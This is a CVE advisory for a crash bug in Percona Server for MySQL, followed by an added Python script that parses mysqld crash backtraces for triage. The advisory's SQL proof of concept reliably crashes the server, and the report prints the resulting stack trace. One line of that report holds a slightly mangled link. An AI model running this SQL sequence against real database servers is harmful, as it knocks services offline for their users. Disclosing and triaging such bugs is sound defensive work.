Headline
CVE-2022-34968: [PS-8294] Server crashed at function fetch_step(que_thr_t*)
An issue in the fetch_step function in Percona Server for MySQL v8.0.28-19 allows attackers to cause a Denial of Service (DoS) via a SQL query.
PoC:
CREATE TABLE t1 (a SERIAL, t TEXT, FULLTEXT f1(t), FULLTEXT f2(t)) ENGINE=InnoDB;
INSERT INTO t1 (a,t) VALUES (1,'1'),(2,'1');
ALTER TABLE t1 ADD COLUMN g TEXT GENERATED ALWAYS AS (t) VIRTUAL;
DELETE FROM t1 WHERE a = 1;
ALTER TABLE t1 DROP INDEX f1;
-- the final INSERT is the statement on which the server crashes
INSERT INTO t1 (a,t) VALUES (1,'1');
Server report:
Build ID: 18aaa142649c55cdd3da3a4b5bea39fe4cc9a679
Server Version: 8.0.28-19 Percona Server (GPL), Release 19, Revision 31e88966cd3
Thread pointer: 0x7f919c000fc0
Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong...
stack_bottom = 7f920c6f6d50 thread_stack 0x100000
/usr/sbin/mysqld(my_print_stacktrace(unsigned char const*, unsigned long)+0x41) [0x20cbe11]
/usr/sbin/mysqld(print_fatal_signal(int)+0x323) [0x11506e3]
/usr/sbin/mysqld(handle_fatal_signal+0xbd) [0x11507ad]
/lib64/libpthread.so.0(+0x12cf0) [0x7f9226022cf0]
/usr/sbin/mysqld() [0x256590c]
/usr/sbin/mysqld() [0x2568c31]
/usr/sbin/mysqld(fetch_step(que_thr_t*)+0xde) [0x233020e]
/usr/sbin/mysqld(que_run_threads(que_thr_t*)+0x498) [0x22dc888]
/usr/sbin/mysqld(fts_eval_sql(trx_t*, que_fork_t*)+0x31) [0x2586e71]
/usr/sbin/mysqld(fts_doc_fetch_by_doc_id(fts_get_doc_t*, unsigned long, dict_index_t*, unsigned long, unsigned long (*)(void*, void*), void*)+0xec) [0x2564d4c]
/usr/sbin/mysqld(fts_init_index(dict_table_t*, unsigned long)+0x1b1) [0x256eac1]
/usr/sbin/mysqld(fts_init_doc_id(dict_table_t const*)+0xed) [0x256ee3d]
/usr/sbin/mysqld(fts_get_next_doc_id(dict_table_t const*, unsigned long*)+0xe5) [0x25709f5]
/usr/sbin/mysqld(fts_create_doc_id(dict_table_t*, dtuple_t*, mem_block_info_t*)+0x8f) [0x2570a9f]
/usr/sbin/mysqld() [0x2302e84]
/usr/sbin/mysqld(ha_innobase::write_row(unsigned char*)+0x339) [0x21dad79]
/usr/sbin/mysqld(handler::ha_write_row(unsigned char*)+0x1a4) [0xcd1b34]
/usr/sbin/mysqld(write_record(THD*, TABLE*, COPY_INFO*, COPY_INFO*)+0x62f) [0xfabc8f]
/usr/sbin/mysqld(Sql_cmd_insert_values::execute_inner(THD*)+0xa35) [0xfad7a5]
/usr/sbin/mysqld(Sql_cmd_dml::execute(THD*)+0x186) [0x104b7c6]
/usr/sbin/mysqld(mysql_execute_command(THD*, bool)+0xa10) [0xfe2d20]
/usr/sbin/mysqld(Prepared_statement::execute(String*, bool)+0x898) [0x10157c8]
/usr/sbin/mysqld(Prepared_statement::execute_loop(String*, bool)+0x12e) [0x101a47e]
/usr/sbin/mysqld(mysqld_stmt_execute(THD*, Prepared_statement*, bool, unsigned long, PS_PARAM*)+0x1b1) [0x101aad1]
/usr/sbin/mysqld(dispatch_command(THD*, COM_DATA const*, enum_server_command)+0x2692) [0xfe96d2]
/usr/sbin/mysqld(do_command(THD*)+0x18d) [0xfea05d]
/usr/sbin/mysqld() [0x1140420]
/usr/sbin/mysqld() [0x25f7ef4]
/lib64/libpthread.so.0(+0x81df) [0x7f92260181df]
/lib64/libc.so.6(clone+0x43) [0x7f92243bcd83]
Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query (7f919c00aeb0): INSERT INTO t1 (a,t) VALUES (1,'1')
Connection ID (thread ID): 8
Status: NOT_KILLED
Please help us make Percona Server better by reporting any bugs at https:http:in the manual which will help you identify the cause of the crash.
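When a report like the one above lands in an incident queue, the first triage questions are: which function was actually executing when the fatal signal fired (the top frames belong to the crash reporter itself, not to the faulting code), does the path run through a particular subsystem (here InnoDB full-text search, the fts_* frames), and which client statement was in flight. The following Python script is an added example, not code from the CVE entry or from Percona; it parses the frame lines of a mysqld "Attempting backtrace" dump into structured records and answers those three questions. The sample report embedded in it is constructed from a subset of the frames quoted in this advisory, and the frame line format it assumes is the standard `binary(symbol+offset) [address]` layout mysqld prints.

```python
"""Triage helper for a mysqld fatal-signal stack dump (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a subset of the frames from the advisory, one per line,
# plus the trailing variable dump mysqld prints after the backtrace.
SAMPLE_REPORT = """\
stack_bottom = 7f920c6f6d50 thread_stack 0x100000
/usr/sbin/mysqld(my_print_stacktrace(unsigned char const*, unsigned long)+0x41) [0x20cbe11]
/usr/sbin/mysqld(print_fatal_signal(int)+0x323) [0x11506e3]
/usr/sbin/mysqld(handle_fatal_signal+0xbd) [0x11507ad]
/lib64/libpthread.so.0(+0x12cf0) [0x7f9226022cf0]
/usr/sbin/mysqld() [0x256590c]
/usr/sbin/mysqld() [0x2568c31]
/usr/sbin/mysqld(fetch_step(que_thr_t*)+0xde) [0x233020e]
/usr/sbin/mysqld(que_run_threads(que_thr_t*)+0x498) [0x22dc888]
/usr/sbin/mysqld(fts_eval_sql(trx_t*, que_fork_t*)+0x31) [0x2586e71]
/usr/sbin/mysqld(fts_init_index(dict_table_t*, unsigned long)+0x1b1) [0x256eac1]
/usr/sbin/mysqld(ha_innobase::write_row(unsigned char*)+0x339) [0x21dad79]
/usr/sbin/mysqld(do_command(THD*)+0x18d) [0xfea05d]
/lib64/libc.so.6(clone+0x43) [0x7f92243bcd83]
Trying to get some variables.
Query (7f919c00aeb0): INSERT INTO t1 (a,t) VALUES (1,'1')
Connection ID (thread ID): 8
Status: NOT_KILLED
"""

# binary(symbol+offset) [address]; symbol and offset may each be absent.
FRAME_RE = re.compile(r"^(\S+?)\((.*?)(?:\+(0x[0-9a-f]+))?\) \[(0x[0-9a-f]+)\]$")
QUERY_RE = re.compile(r"^Query \([0-9a-f]+\): (.*)$", re.MULTILINE)

# Frames that belong to the crash-reporting machinery, not to the code that faulted.
SIGNAL_HANDLER_FRAMES = ("my_print_stacktrace", "print_fatal_signal", "handle_fatal_signal")


@dataclass
class Frame:
    binary: str
    symbol: str            # demangled symbol with argument list; "" if unsymbolized
    offset: Optional[str]  # hex offset into the symbol, or None
    address: str

    @property
    def name(self) -> str:
        """Symbol without its argument list, e.g. 'fetch_step'."""
        return self.symbol.split("(", 1)[0]


def parse_frames(report: str) -> List[Frame]:
    """Return the backtrace frames in the order printed (innermost first)."""
    frames = []
    for line in report.splitlines():
        m = FRAME_RE.match(line.strip())
        if m:
            frames.append(Frame(m.group(1), m.group(2), m.group(3), m.group(4)))
    return frames


def innermost_symbolized(frames: List[Frame]) -> Optional[Frame]:
    """First named mysqld frame below the signal handler.

    Unsymbolized frames (static functions with no exported symbol) are skipped,
    so the result is the nearest function the binary can name for the fault.
    """
    start = 0
    for i, f in enumerate(frames):
        if f.name in SIGNAL_HANDLER_FRAMES:
            start = i + 1
    for f in frames[start:]:
        if f.symbol and "mysqld" in f.binary:
            return f
    return None


def involves_fts(frames: List[Frame]) -> bool:
    """True if the faulting path passes through InnoDB full-text (fts_*) code."""
    return any(f.name.startswith("fts_") for f in frames)


def crash_query(report: str) -> Optional[str]:
    """The statement the crashing thread was executing, if mysqld printed it."""
    m = QUERY_RE.search(report)
    return m.group(1).strip() if m else None


def triage(report: str) -> Dict[str, object]:
    """Summarise a crash report into the fields an incident ticket needs."""
    frames = parse_frames(report)
    top = innermost_symbolized(frames)
    return {
        "frame_count": len(frames),
        "crash_function": top.name if top else None,
        "fts_involved": involves_fts(frames),
        "query": crash_query(report),
        "storage_engine_entry": [f.name for f in frames if f.name.startswith("ha_")],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

Run on the sample, the script names `fetch_step` as the crashing function, flags the fts_* frames, and recovers the final `INSERT` from the PoC as the in-flight statement, which is enough to match the report against this advisory without reading the raw dump by hand.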